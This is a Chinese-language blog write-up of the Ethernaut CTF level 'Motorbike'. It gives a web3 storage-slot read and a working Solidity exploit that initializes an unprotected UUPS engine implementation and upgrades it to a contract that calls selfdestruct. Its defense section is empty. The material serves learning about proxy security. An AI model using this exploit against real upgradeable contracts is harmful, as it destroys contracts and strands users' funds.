# 智能合约黑客攻击 Ethernaut:  
 25. Motorbike

By [Leek DEV](https://paragraph.com/@leekdev) · 2023-09-28

---

[Ethernaut](https://ethernaut.openzeppelin.com/) 是一个由 [OpenZeppelin](https://www.openzeppelin.com/) 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。

教程
--

*   GitHub - [攻击代码](https://github.com/6boris)
    
*   Bilibili - [视频教程](https://space.bilibili.com/3493272831920239)
    
*   YouTube - [视频教程](https://www.youtube.com/@LeekDEV)
    
*   TikTok - ….
    

题目
--

让 motorbike 合约不可用。

Hack思路
------

…

从slot中读取 engine 合约地址

    await web3.eth.getStorageAt(instance, '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc')
    

用 engine 的合约地址执行攻击

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;
    
    interface IEngine {
        function initialize() external;
        function upgradeToAndCall(address newImplementation, bytes memory data) external payable;
    }
    
    contract _motorbikeHackTool {
        function initialize() external {
            selfdestruct(payable(msg.sender));
        }
    }
    
    contract MotorbikeHack {
        IEngine public exploitInst;
    
        constructor(address _target) {
            exploitInst = IEngine(_target);
            exploitInst.initialize();
            exploitInst.upgradeToAndCall(address(new _motorbikeHackTool()), abi.encodeWithSignature("initialize()"));
        }
    }
    

Hack案例
------

…

防范思路
----

…

参考资料
----

*   [ERC-1967: Proxy Storage Slots](https://eips.ethereum.org/EIPS/eip-1967)
    
*   [UUPS Proxies: Tutorial (Solidity + JavaScript)](https://forum.openzeppelin.com/t/uups-proxies-tutorial-solidity-javascript/7786)
    
*   [packages/core/contracts/Initializable.sol](https://github.com/OpenZeppelin/openzeppelin-upgrades/blob/master/packages/core/contracts/Initializable.sol)

---

*Originally published on [Leek DEV](https://paragraph.com/@leekdev/ethernaut-25-motorbike)*